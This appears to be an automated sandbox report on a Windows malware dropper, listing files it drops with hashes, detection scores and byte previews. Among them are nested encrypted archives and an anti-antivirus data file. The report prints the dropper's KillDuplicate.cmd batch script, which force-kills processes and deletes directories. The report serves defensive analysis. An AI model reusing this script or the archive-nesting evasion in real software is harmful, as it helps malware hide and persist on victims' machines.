SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3047936
Entropy (8bit):	6.5380962224606805
Encrypted:	false
SSDEEP:	49152:rXbVHNeIAyjLGBiZQo42rhxAZimUH0wH6faFgmiCk/uIL:rzxXnGBiZQo42rhxAZi0wHymU
MD5:	99A7A8AB2463DD70F90E0AB4E0AEC4A8
SHA1:	B9E2B99B7124D83DF3B7CD052231CB35D1D6EFCB
SHA-256:	89601168C7196328F763FAF4DD415B041C94F6D5FE5C2B7094D49DBA69926A61
SHA-512:	8E775104CC32B5426FBFE170632CA36949E66701A52B83FD8378B4ECA239F928094DFCA10BA9AE363C8AAAD59F863260427FC5449EA7CA0E22DDDA4256326E55
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 50%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C.........................PE..L....V.f.............................02...........@..........................`2.....#./...@.................................W...k.............................2...............................2..................................................... . ............................@....rsrc...............................@....idata ............................@...tddfmghq.p+......h+.................@...zxizpfjk..... 2......\..............@....taggant.0...02.."...`..............@...........................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Local\Temp\main\7z.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\1018743001\c359af6492.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1679360
Entropy (8bit):	6.278252955513617
Encrypted:	false
SSDEEP:	24576:S+clx4tCQJSVAFja8i/RwQQmzgO67V3bYgR+zypEqxr2VSlLP:jclmJSVARa86xzW3xRoyqqxrT
MD5:	72491C7B87A7C2DD350B727444F13BB4
SHA1:	1E9338D56DB7DED386878EAB7BB44B8934AB1BC7
SHA-256:	34AD9BB80FE8BF28171E671228EB5B64A55CAA388C31CB8C0DF77C0136735891
SHA-512:	583D0859D29145DFC48287C5A1B459E5DB4E939624BD549FF02C61EAE8A0F31FC96A509F3E146200CDD4C93B154123E5ADFBFE01F7D172DB33968155189B5511
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........w...$...$...$.&.$...$.&.$...$...$...$.&.$%..$.&.$..$.&G$...$.&.$...$.&.$...$.&.$...$Rich...$........................PE..d.....n\.........." .........H...............................................P............`.............................................y...l...x........{...p.......................................................................................................text............................... ..`.rdata..9...........................@..@.data...............................@....pdata.......p... ..................@..@.rsrc....{.......\|..................@..@.reloc...0.......2...n..............@..B........................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\main\7z.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\1018743001\c359af6492.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	468992
Entropy (8bit):	6.157743912672224
Encrypted:	false
SSDEEP:	6144:fz1gL5pRTMTTjMkId/BynSx7dEe6XwzRaktNP08NhKs39zo43fTtl1fayCV7+DHV:r1gL5pRTcAkS/3hzN8qE43fm78V
MD5:	619F7135621B50FD1900FF24AADE1524
SHA1:	6C7EA8BBD435163AE3945CBEF30EF6B9872A4591
SHA-256:	344F076BB1211CB02ECA9E5ED2C0CE59BCF74CCBC749EC611538FA14ECB9AAD2
SHA-512:	2C7293C084D09BC2E3AE2D066DD7B331C810D9E2EECA8B236A8E87FDEB18E877B948747D3491FCAFF245816507685250BD35F984C67A43B29B0AE31ECB2BD628
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........(...{...{...{...{...{...{...{...{...{...{...{...{...{..!{...{...{...{...{...{Rich...{................PE..d.....n\.........."..........l...... .........@...........................................`.....................................................x....`..........,a...........p.......................................................... ............................text............................... ..`.rdata..............................@..@.data....,..........................@....pdata..,a.......b..................@..@.rsrc........`......................@..@.reloc.......p......................@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\main\KillDuplicate.cmd

Download File

Process:	C:\Users\user\AppData\Local\Temp\1018743001\c359af6492.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	222
Entropy (8bit):	4.855194602218789
Encrypted:	false
SSDEEP:	6:vFuj9HUHOPLtInnIgvRY77flFjfA+qpxuArS3+xTfVk3:duj9HeONgvRYnlfYFrSMTtk3
MD5:	68CECDF24AA2FD011ECE466F00EF8450
SHA1:	2F859046187E0D5286D0566FAC590B1836F6E1B7
SHA-256:	64929489DC8A0D66EA95113D4E676368EDB576EA85D23564D53346B21C202770
SHA-512:	471305140CF67ABAEC6927058853EF43C97BDCA763398263FB7932550D72D69B2A9668B286DF80B6B28E9DD1CBA1C44AAA436931F42CC57766EFF280FDB5477C
Malicious:	false
Preview:	Cd /d %1..Rd "%SfxVarApiPath%"..For /f "Tokens=1,2 Delims=," %%I In ('TaskList /fo CSV /nh') Do (.. If %%I==%2 (.. Set /a N+=1.. Set PID=%%~J.. )..)..If %N% EQU 1 Rd /s /q %1..If %N% GTR 1 TaskKill /pid %PID% /t /f

C:\Users\user\AppData\Local\Temp\main\extracted\AntiAV.data

Download File

Process:	C:\Users\user\AppData\Local\Temp\main\7z.exe
File Type:	ASCII text, with very long lines (65536), with no line terminators
Category:	dropped
Size (bytes):	2355713
Entropy (8bit):	5.891648193754473
Encrypted:	false
SSDEEP:	24576:5yZBPkpRrP9pxC+XvoflcYy36s3vb0EecYy37n92k8GtGAQZ67hR7krC/Cyf0/xO:R9kqGu7okoZscCnf0/Zs9p
MD5:	579A63BEBCCBACAB8F14132F9FC31B89
SHA1:	FCA8A51077D352741A9C1FF8A493064EF5052F27
SHA-256:	0AC3504D5FA0460CAE3C0FD9C4B628E1A65547A60563E6D1F006D17D5A6354B0
SHA-512:	4A58CA0F392187A483B9EF652B6E8B2E60D01DAA5D331549DF9F359D2C0A181E975CF9DF79552E3474B9D77F8E37A1CF23725F32D4CDBE4885E257A7625F7B1F
Malicious:	false
Preview:	KmO6sb9bzFlO6QmlyBR3cUuBrPdmJRJBhXshklfui2fRJCiITlYNEM2EqC9x9I0qVq7CGnIhkwh6hvGvu5pkfBRaoLATG90WNTmCTDFIBTSnd7l9KiCxIUJ5zlBvrKkHZaxyJb0N052Q1AaMDCASX2cw1ZaV1bKcufYPprTSqVIRscgIruKC2MOUPLxNBR1egyVxwSbedVhVl89lRxHAMRMf16G6Ry1TTz7dOtnEaLQowPwuw8eDnR20ZOyf9yYTVcpDsiS4K2VzryfyiwiOXZDq7UaTFrtOgtVQzuNXN74O8xkfvt4Ykzxcs60WfAkGZKsYbwZWS4bPPY8cze1vDL6leHmcDUIbsBvTleZtzGhgeYGdRaUmv5ljenoBZOBDIndh9KTa7zBVHuP4jAK8C2IKaB5BgFReYTleqD0cCkhTdxbkQAMwHPuKktcCRORGmFfE37OzhnpNUtRyIHoGBwau6RcKp6vTNwIWRMkDjZaejD2NS5TCgRvcwgZcldKIAtOqIN0TXMXlnX6scNgHltMTvvwSZbBsDdCGRINZlutVfbP6joQl5sw21ICykYYYKwRfLlfpREpOzuAjwo7oC8hJ4Tv652auJh1RujdaLcIfX5oB1GDuu95ojl52qB08Lzg7nIl7yDb4k9X8rUPZ857XTGTaXkhL77wwG75hAnvfazjbPfP5GZrDYRdhe2I0zSJZuV5aaWd5Imf8Ck0w9ALkKR7xhRlclC4FnJOBuXxpdcsG9gE8tgukaoXpzf4z0CHJ0VOfBNcErBEPyoWMZfee3Vfg2NyLVPvaC6c5HNC1mZSr0SpB1RAlj2w7ST9eZL5DUYwl8p6flt6I3p7MBJrZLlY3LgBSr5F4BYYU6sebHdx0ES2Ci6J9wBw0wGLCy8SeSDS45pkrvWvTZkvW2oFTNBda3aYJyut0zJi1Chjp4xQkH1cEMWZUOy7MueiWNcfeKZqM4Gg2hr7XoLoTQXyvcXvxeOwXoXJKXvu4

C:\Users\user\AppData\Local\Temp\main\extracted\file_1.zip

Download File

Process:	C:\Users\user\AppData\Local\Temp\main\7z.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=deflate
Category:	dropped
Size (bytes):	1799594
Entropy (8bit):	7.99773141173711
Encrypted:	true
SSDEEP:	49152:8yj13b27Gvrb6VZvqF7iGc8bbmuXZTsD28cz2TPt0JhJ+:tj13Trb6i5iGmuXZTbBizt0Jhc
MD5:	5659EBA6A774F9D5322F249AD989114A
SHA1:	4BFB12AA98A1DC2206BAA0AC611877B815810E4C
SHA-256:	E04346FEE15C3F98387A3641E0BBA2E555A5A9B0200E4B9256B1B77094069AE4
SHA-512:	F93ABF2787B1E06CE999A0CBC67DC787B791A58F9CE20AF5587B2060D663F26BE9F648D116D9CA279AF39299EA5D38E3C86271297E47C1438102CA28FCE8EDC4
Malicious:	false
Preview:	PK........i..Y..5..u..........in.exe.Y.4.a...3c0.e.c..X....0.\[...3Hb....^...T.-f..$k.b..#&.B.v...s.s....{.......{..\|.s.O......._....H.........(4.Io..""..q...CO.......G...)1......!...c:....=.....h.w?.o.q................4,.....\..:................_................(...S......Q.....wP..../3.......?..b......@.m.;.W...........:......8.......a..o.O....a......."......'..S....@....&.V.........(..p...u.sa=F.....~.".p..".B...eE...x..w.m....d..h...4...@.`......F.Z......h.[._O.\f....t..?..7s\|&Fj..T:.m...J..sk..t.\K]...h5..[...).E.,.4.....u...tP7B.0.I...H.15........+..[..G..)...M..;..H.?g...\.\.ZT.Q..&..@....nnx......s..1W...x.W..M2.h@.C@<.B\.&..:hgwM...$...y....._..z?....< ..T.._..^./m{.E..Y*.;ol..&_/./....3........x.%....$..=.^}.}..53.....\|...\|-... #..Z-.b.Ej...q.u..L-..x8...%..P:PKs...]....}...;:.Z........H..3k..F..:....X2a.e..G..f6...}....H.V.#r.H....T.....!....~...R%xu....(^......U.{.......l..RtFDi......./..t?......6FU....;2].@...z..8..K^B/W..

C:\Users\user\AppData\Local\Temp\main\extracted\file_2.zip

Download File

Process:	C:\Users\user\AppData\Local\Temp\main\7z.exe
File Type:	Zip archive data, at least v1.0 to extract, compression method=store
Category:	dropped
Size (bytes):	1799748
Entropy (8bit):	7.997729415613798
Encrypted:	true
SSDEEP:	49152:5yj13b27Gvrb6VZvqF7iGc8bbmuXZTsD28cz2TPt0JhJ/:4j13Trb6i5iGmuXZTbBizt0Jhl
MD5:	5404286EC7853897B3BA00ADF824D6C1
SHA1:	39E543E08B34311B82F6E909E1E67E2F4AFEC551
SHA-256:	EC94A6666A3103BA6BE60B92E843075A2D7FE7D30FA41099C3F3B1E2A5EBA266
SHA-512:	C4B78298C42148D393FEEA6C3941C48DEF7C92EF0E6BAAC99144B083937D0A80D3C15BD9A0BF40DAA60919968B120D62999FA61AF320E507F7E99FBFE9B9EF30
Malicious:	false
Preview:	PK........n..YC.?.u...u......file_1.zipPK........i..Y..5..u..........in.exe.Y.4.a...3c0.e.c..X....0.\[...3Hb....^...T.-f..$k.b..#&.B.v...s.s....{.......{..\|.s.O......._....H.........(4.Io..""..q...CO.......G...)1......!...c:....=.....h.w?.o.q................4,.....\..:................_................(...S......Q.....wP..../3.......?..b......@.m.;.W...........:......8.......a..o.O....a......."......'..S....@....&.V.........(..p...u.sa=F.....~.".p..".B...eE...x..w.m....d..h...4...@.`......F.Z......h.[._O.\f....t..?..7s\|&Fj..T:.m...J..sk..t.\K]...h5..[...).E.,.4.....u...tP7B.0.I...H.15........+..[..G..)...M..;..H.?g...\.\.ZT.Q..&..@....nnx......s..1W...x.W..M2.h@.C@<.B\.&..:hgwM...$...y....._..z?....< ..T.._..^./m{.E..Y.;ol..&_/./....3........x.%....$..=.^}.}..53.....\|...\|-... #..Z-.b.Ej...q.u..L-..x8...%..P:PKs...]....}...;:.Z........H..3k..F..:....X2a.e..G..f6...}....H.V.#r.H....T.....!....~...R%xu....(^......U.{.......l..RtFDi......./

C:\Users\user\AppData\Local\Temp\main\extracted\file_3.zip

Download File

Process:	C:\Users\user\AppData\Local\Temp\main\7z.exe
File Type:	Zip archive data, at least v1.0 to extract, compression method=store
Category:	dropped
Size (bytes):	1799902
Entropy (8bit):	7.997726708945573
Encrypted:	true
SSDEEP:	49152:Cyj13b27Gvrb6VZvqF7iGc8bbmuXZTsD28cz2TPt0JhJV:nj13Trb6i5iGmuXZTbBizt0Jh3
MD5:	5EB39BA3698C99891A6B6EB036CFB653
SHA1:	D2F1CDD59669F006A2F1AA9214AEED48BC88C06E
SHA-256:	E77F5E03AE140DDA27D73E1FFE43F7911E006A108CF51CBD0E05D73AA92DA7C2
SHA-512:	6C4CA20E88D49256ED9CABEC0D1F2B00DFCF3D1603B5C95D158D4438C9F1E58495F8DFA200DBE7F49B5B0DD57886517EB3B98C4190484548720DAD4B3DB6069E
Malicious:	false
Preview:	PK........n..Y...rDv..Dv......file_2.zipPK........n..YC.?.u...u......file_1.zipPK........i..Y..5..u..........in.exe.Y.4.a...3c0.e.c..X....0.\[...3Hb....^...T.-f..$k.b..#&.B.v...s.s....{.......{..\|.s.O......._....H.........(4.Io..""..q...CO.......G...)1......!...c:....=.....h.w?.o.q................4,.....\..:................_................(...S......Q.....wP..../3.......?..b......@.m.;.W...........:......8.......a..o.O....a......."......'..S....@....&.V.........(..p...u.sa=F.....~.".p..".B...eE...x..w.m....d..h...4...@.`......F.Z......h.[._O.\f....t..?..7s\|&Fj..T:.m...J..sk..t.\K]...h5..[...).E.,.4.....u...tP7B.0.I...H.15........+..[..G..)...M..;..H.?g...\.\.ZT.Q..&..@....nnx......s..1W...x.W..M2.h@.C@<.B\.&..:hgwM...$...y....._..z?....< ..T.._..^./m{.E..Y.;ol..&_/./....3........x.%....$..=.^}.}..53.....\|...\|-... #..Z-.b.Ej...q.u..L-..x8...%..P:PKs...]....}...;:.Z........H..3k..F..:....X2a.e..G..f6...}....H.V.#r.H....T.....!....~...R%xu..

C:\Users\user\AppData\Local\Temp\main\extracted\file_4.zip

Download File

Process:	C:\Users\user\AppData\Local\Temp\main\7z.exe
File Type:	Zip archive data, at least v1.0 to extract, compression method=store
Category:	dropped
Size (bytes):	1800056
Entropy (8bit):	7.997723543142523
Encrypted:	true
SSDEEP:	49152:Zyj13b27Gvrb6VZvqF7iGc8bbmuXZTsD28cz2TPt0JhJQ:Yj13Trb6i5iGmuXZTbBizt0Jhm
MD5:	7187CC2643AFFAB4CA29D92251C96DEE
SHA1:	AB0A4DE90A14551834E12BB2C8C6B9EE517ACAF4
SHA-256:	C7E92A1AF295307FB92AD534E05FBA879A7CF6716F93AEFCA0EBFCB8CEE7A830
SHA-512:	27985D317A5C844871FFB2527D04AA50EF7442B2F00D69D5AB6BBB85CD7BE1D7057FFD3151D0896F05603677C2F7361ED021EAC921E012D74DA049EF6949E3A3
Malicious:	false
Preview:	PK........n..Y....v...v......file_3.zipPK........n..Y...rDv..Dv......file_2.zipPK........n..YC.?.u...u......file_1.zipPK........i..Y..5..u..........in.exe.Y.4.a...3c0.e.c..X....0.\[...3Hb....^...T.-f..$k.b..#&.B.v...s.s....{.......{..\|.s.O......._....H.........(4.Io..""..q...CO.......G...)1......!...c:....=.....h.w?.o.q................4,.....\..:................_................(...S......Q.....wP..../3.......?..b......@.m.;.W...........:......8.......a..o.O....a......."......'..S....@....&.V.........(..p...u.sa=F.....~.".p..".B...eE...x..w.m....d..h...4...@.`......F.Z......h.[._O.\f....t..?..7s\|&Fj..T:.m...J..sk..t.\K]...h5..[...).E.,.4.....u...tP7B.0.I...H.15........+..[..G..)...M..;..H.?g...\.\.ZT.Q..&..@....nnx......s..1W...x.W..M2.h@.C@<.B\.&..:hgwM...$...y....._..z?....< ..T.._..^./m{.E..Y.;ol..&_/./....3........x.%....$..=.^}.}..53.....\|...\|-... #..Z-.b.Ej...q.u..L-..x8...%..P:PKs...]....}...;:.Z........H..3k..F..:....X2a.e..G..f6...}.

C:\Users\user\AppData\Local\Temp\main\extracted\file_5.zip

Download File

Process:	C:\Users\user\AppData\Local\Temp\main\7z.exe
File Type:	Zip archive data, at least v1.0 to extract, compression method=store
Category:	dropped
Size (bytes):	1800210
Entropy (8bit):	7.997720745184939
Encrypted:	true
SSDEEP:	49152:ayj13b27Gvrb6VZvqF7iGc8bbmuXZTsD28cz2TPt0JhJw:Pj13Trb6i5iGmuXZTbBizt0JhG
MD5:	B7D1E04629BEC112923446FDA5391731
SHA1:	814055286F963DDAA5BF3019821CB8A565B56CB8
SHA-256:	4DA77D4EE30AD0CD56CD620F4E9DC4016244ACE015C5B4B43F8F37DD8E3A8789
SHA-512:	79FC3606B0FE6A1E31A2ECACC96623CAF236BF2BE692DADAB6EA8FFA4AF4231D782094A63B76631068364AC9B6A872B02F1E080636EBA40ED019C2949A8E28DB
Malicious:	false
Preview:	PK........n..Yab..xw..xw......file_4.zipPK........n..Y....v...v......file_3.zipPK........n..Y...rDv..Dv......file_2.zipPK........n..YC.?.u...u......file_1.zipPK........i..Y..5..u..........in.exe.Y.4.a...3c0.e.c..X....0.\[...3Hb....^...T.-f..$k.b..#&.B.v...s.s....{.......{..\|.s.O......._....H.........(4.Io..""..q...CO.......G...)1......!...c:....=.....h.w?.o.q................4,.....\..:................_................(...S......Q.....wP..../3.......?..b......@.m.;.W...........:......8.......a..o.O....a......."......'..S....@....&.V.........(..p...u.sa=F.....~.".p..".B...eE...x..w.m....d..h...4...@.`......F.Z......h.[._O.\f....t..?..7s\|&Fj..T:.m...J..sk..t.\K]...h5..[...).E.,.4.....u...tP7B.0.I...H.15........+..[..G..)...M..;..H.?g...\.\.ZT.Q..&..@....nnx......s..1W...x.W..M2.h@.C@<.B\.&..:hgwM...$...y....._..z?....< ..T.._..^./m{.E..Y.;ol..&_/./....3........x.%....$..=.^}.}..53.....\|...\|-... #..Z-.b.Ej...q.u..L-..x8...%..P:PKs...]....}...;:.Z..

C:\Users\user\AppData\Local\Temp\main\extracted\file_6.zip

Download File

Process:	C:\Users\user\AppData\Local\Temp\main\7z.exe
File Type:	Zip archive data, at least v1.0 to extract, compression method=store
Category:	dropped
Size (bytes):	1800364
Entropy (8bit):	7.997716835838842
Encrypted:	true
SSDEEP:	49152:kyj13b27Gvrb6VZvqF7iGc8bbmuXZTsD28cz2TPt0JhJv:lj13Trb6i5iGmuXZTbBizt0Jht
MD5:	0DC4014FACF82AA027904C1BE1D403C1
SHA1:	5E6D6C020BFC2E6F24F3D237946B0103FE9B1831
SHA-256:	A29DDD29958C64E0AF1A848409E97401307277BB6F11777B1CFB0404A6226DE7
SHA-512:	CBEEAD189918657CC81E844ED9673EE8F743AED29AD9948E90AFDFBECACC9C764FBDBFB92E8C8CEB5AE47CEE52E833E386A304DB0572C7130D1A54FD9C2CC028
Malicious:	false
Preview:	PK........n..Y..+..x...x......file_5.zipPK........n..Yab..xw..xw......file_4.zipPK........n..Y....v...v......file_3.zipPK........n..Y...rDv..Dv......file_2.zipPK........n..YC.?.u...u......file_1.zipPK........i..Y..5..u..........in.exe.Y.4.a...3c0.e.c..X....0.\[...3Hb....^...T.-f..$k.b..#&.B.v...s.s....{.......{..\|.s.O......._....H.........(4.Io..""..q...CO.......G...)1......!...c:....=.....h.w?.o.q................4,.....\..:................_................(...S......Q.....wP..../3.......?..b......@.m.;.W...........:......8.......a..o.O....a......."......'..S....@....&.V.........(..p...u.sa=F.....~.".p..".B...eE...x..w.m....d..h...4...@.`......F.Z......h.[._O.\f....t..?..7s\|&Fj..T:.m...J..sk..t.\K]...h5..[...).E.,.4.....u...tP7B.0.I...H.15........+..[..G..)...M..;..H.?g...\.\.ZT.Q..&..@....nnx......s..1W...x.W..M2.h@.C@<.B\.&..:hgwM...$...y....._..z?....< ..T.._..^./m{.E..Y.;ol..&_/./....3........x.%....$..=.^}.}..53.....\|...\|-... #..Z-.b.Ej...q.u..

C:\Users\user\AppData\Local\Temp\main\extracted\file_7.zip

Download File

Process:	C:\Users\user\AppData\Local\Temp\main\7z.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=deflate
Category:	dropped
Size (bytes):	3473559
Entropy (8bit):	7.9992359395959935
Encrypted:	true
SSDEEP:	98304:8aR3D0Ae5mwdkDWm1Xo4j13Trb6i5iGmuXZTbBizt0Jhd:ds5m6sXoArb6iguZnBi5Qd
MD5:	CEA368FC334A9AEC1ECFF4B15612E5B0
SHA1:	493D23F72731BB570D904014FFDACBBA2334CE26
SHA-256:	07E38CAD68B0CDBEA62F55F9BC6EE80545C2E1A39983BAA222E8AF788F028541
SHA-512:	BED35A1CC56F32E0109EA5A02578489682A990B5CEFA58D7CF778815254AF9849E731031E824ADBA07C86C8425DF58A1967AC84CE004C62E316A2E51A75C8748
Malicious:	false
Preview:	PK........n..Y`.T......#.....AntiAV.data..E..@.D..C/qwg..;...mG.3H..\|...$..}.`..8......lV1..4...Cu.H.(l+{Cl.:........$+Nr....\.u.K_1N:k.'....F...... .....+.70..R.>..A..#6L.:..n..7......Y..y......v.,....=...e....fe.4.@...h..+....=.#...T......A..\|...{A.p{.b*.\|.[...Q...z.v.....iD.....W.....;...........YVL._._.F..4./g;syC.....e,.N..>t.43..p.T4?.K.....:Z.XDVS.gj.)cp..A9.7^.d.M.d.j..c:.(T<J._3-..8.,."s.'...B\.q...\..e.!..{l.\.]'.P.2}..l@^.G...{n..p..u.n.1;W..#..p.A.YD7.....,.o..z;.6T../.w..=.3K5..]............U...,r....n....(..I.....Q.o%.NF..Q.h$y.".7.tU..eVe.b.q.S4%"C..$g..iX..XQl..?Z.U.\|.g....&.d..Y.\|..5O...s.\|..A..@.Y1F.o.o.s.'UY.AU#....D.K.....A....=t.M..L4...{.....BF.Rg.-...j..p.c..'.2....].m..w37t...Rn.r....v....W..g0E......)-.6.=v/.9...o..~.mh.U.&...5.ld4k.gG.G.S.w4G..]'.5......r..Q.U.U.9.Vv....2.>....p.s.p..e....(..}Jox.....Z..[Y..ku.....5....s.././....:...v......h.u.ZlG.>).,.(....Ye<.....3...:T:)...-).=.L.=.2F....&H7..j..\.B6.Ox.\....

C:\Users\user\AppData\Local\Temp\main\extracted\in.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\main\7z.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1827328
Entropy (8bit):	7.963282633529333
Encrypted:	false
SSDEEP:	49152:2AVavyjrvfTYx9Z+tylUcecGjcM7B68ue7KhNzw:2AkvyvfTYxTUTj77B68uRe
MD5:	83D75087C9BF6E4F07C36E550731CCDE
SHA1:	D5FF596961CCE5F03F842CFD8F27DDE6F124E3AE
SHA-256:	46DB3164BEBFFC61C201FE1E086BFFE129DDFED575E6D839DDB4F9622963FB3F
SHA-512:	044E1F5507E92715CE9DF8BB802E83157237A2F96F39BAC3B6A444175F1160C4D82F41A0BCECF5FEAF1C919272ED7929BAEF929A8C3F07DEECEBC44B0435164A
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 70%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d.....Pg.........."...............-...H...-....@..............................I...........`...................................................H...............H...............H...............................H.(.....H.8...........................................UPX0......-.............................UPX1..........-.....................@...UPX2..........H.....................@...4.24.UPX!.$..=g.7....Z.H......zH.I..-.3..VH.. H......................1...MZ...o"uKHcQ<.<.PE.>H..8Q.6...[.J.t..lu'.yt.r!H....y........"....9.o.m.........1ZH....g.n.....l8..0..0..!.0..\|..(.(,....8.u....'~....*../.. ^.....(v...w....YR....oD.i....H.D$ ~.9..FL......\..(..<..u....I..D.I...f.AWAVVWS.eN.%0g.....x.5.2.H..>...t.H..}.9.t)L..g..f.H....>....A..Q.u.=.X..........:\|...oh.?.....^......;.]uzZ..{Q.s`AF..2PQd......p..B....o...t.1.=E6...'u7.p.)<Z.,(".f....Z..a..,+.GLO,v...\=^X...

C:\Users\user\AppData\Local\Temp\main\file.bin

Download File

Process:	C:\Users\user\AppData\Local\Temp\1018743001\c359af6492.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=store
Category:	dropped
Size (bytes):	3473725
Entropy (8bit):	7.999948676888215
Encrypted:	true
SSDEEP:	49152:9b8s3/pc44zfeVeY45ZADJE7ZdXrYX+RyWGGdVPLv7+joMMPlHxNwNrRPXD3tI:LP0eQz5Zwm7ZdEOhdLrK0l2FpI
MD5:	045B0A3D5BE6F10DDF19AE6D92DFDD70
SHA1:	0387715B6681D7097D372CD0005B664F76C933C7
SHA-256:	94B392E94FA47D1B9B7AE6A29527727268CC2E3484E818C23608F8835BC1104D
SHA-512:	58255A755531791B888FFD9B663CC678C63D5CAA932260E9546B1B10A8D54208334725C14529116B067BCF5A5E02DA85E015A3BED80092B7698A43DAB0168C7B
Malicious:	false
Preview:	PK........n..Yd=,..5...5.....file_7.zipm..+]..E....`...._..'.....DXW\|._6.Kau^.O....W.0.....fE....Q:.t`9.9"..c.... .[(2..[m{.`S.?8...w.v.{zo/a....E..L.1..<.....].@.....:...3?. k.5....H.=......0.A.,3p......_R.......[.7....j.Ba$v1AO.@q....x...u..9.k..z.p...5.....-(.b...y.........S.../..l.Q.....)....w..@...w;.;2.&Q.w.....Hn.3A.z.i..0i%A..E-7.....8....(.Z.A....k.......=.g.,......N.Yt`....)....T.....f..P.....u4ig.......B...~-7...Y]Ct.6.7..PS.Su7yx8...#.......B.3.f."....x.-u.....M.%.a.._\D.5.G....O.P....,b.;=.k[....4......SdS....gL.....X.......G...f.P....p.PS.~.P.}...X.7.+Ap.-.....^'..\.6..r.2.p.wd...dd....(..S..N..#.M....~..L..sjX...,..B.........-..R..~..A..B...MF..,.z.........lK.]<"..,...K.~..S.Z...p).......z..I..E.MG.M].....F.SY.p..1...sM7...B...l......g..V...q..p}$%iM....L...N...;.......}/Y8..&zAO&0..s.{.pR.A...Y`..Q.../n..,........z.&.k.`TU...7lv.xQ@~.'..H.S..y...n48......m....s1(.`.....,.n;j...CX.s..sN.L..q.u.G.....q.M..:..xI":Y.

C:\Users\user\AppData\Local\Temp\main\file.zip (copy)

Download File

Process:	C:\Windows\System32\cmd.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=store
Category:	dropped
Size (bytes):	3473725
Entropy (8bit):	7.999948676888215
Encrypted:	true
SSDEEP:	49152:9b8s3/pc44zfeVeY45ZADJE7ZdXrYX+RyWGGdVPLv7+joMMPlHxNwNrRPXD3tI:LP0eQz5Zwm7ZdEOhdLrK0l2FpI
MD5:	045B0A3D5BE6F10DDF19AE6D92DFDD70
SHA1:	0387715B6681D7097D372CD0005B664F76C933C7
SHA-256:	94B392E94FA47D1B9B7AE6A29527727268CC2E3484E818C23608F8835BC1104D
SHA-512:	58255A755531791B888FFD9B663CC678C63D5CAA932260E9546B1B10A8D54208334725C14529116B067BCF5A5E02DA85E015A3BED80092B7698A43DAB0168C7B
Malicious:	false
Preview:	PK........n..Yd=,..5...5.....file_7.zipm..+]..E....`...._..'.....DXW\|._6.Kau^.O....W.0.....fE....Q:.t`9.9"..c.... .[(2..[m{.`S.?8...w.v.{zo/a....E..L.1..<.....].@.....:...3?. k.5....H.=......0.A.,3p......_R.......[.7....j.Ba$v1AO.@q....x...u..9.k..z.p...5.....-(.b...y.........S.../..l.Q.....)....w..@...w;.;2.&Q.w.....Hn.3A.z.i..0i%A..E-7.....8....(.Z.A....k.......=.g.,......N.Yt`....)....T.....f..P.....u4ig.......B...~-7...Y]Ct.6.7..PS.Su7yx8...#.......B.3.f."....x.-u.....M.%.a.._\D.5.G....O.P....,b.;=.k[....4......SdS....gL.....X.......G...f.P....p.PS.~.P.}...X.7.+Ap.-.....^'..\.6..r.2.p.wd...dd....(..S..N..#.M....~..L..sjX...,..B.........-..R..~..A..B...MF..,.z.........lK.]<"..,...K.~..S.Z...p).......z..I..E.MG.M].....F.SY.p..1...sM7...B...l......g..V...q..p}$%iM....L...N...;.......}/Y8..&zAO&0..s.{.pR.A...Y`..Q.../n..,........z.&.k.`TU...7lv.xQ@~.'..H.S..y...n48......m....s1(.`.....,.n;j...CX.s..sN.L..q.u.G.....q.M..:..xI":Y.

C:\Users\user\AppData\Local\Temp\main\main.bat

Download File

Process:	C:\Users\user\AppData\Local\Temp\1018743001\c359af6492.exe
File Type:	Unicode text, UTF-16, little-endian text, with no line terminators
Category:	dropped
Size (bytes):	440
Entropy (8bit):	5.0791308599041844
Encrypted:	false
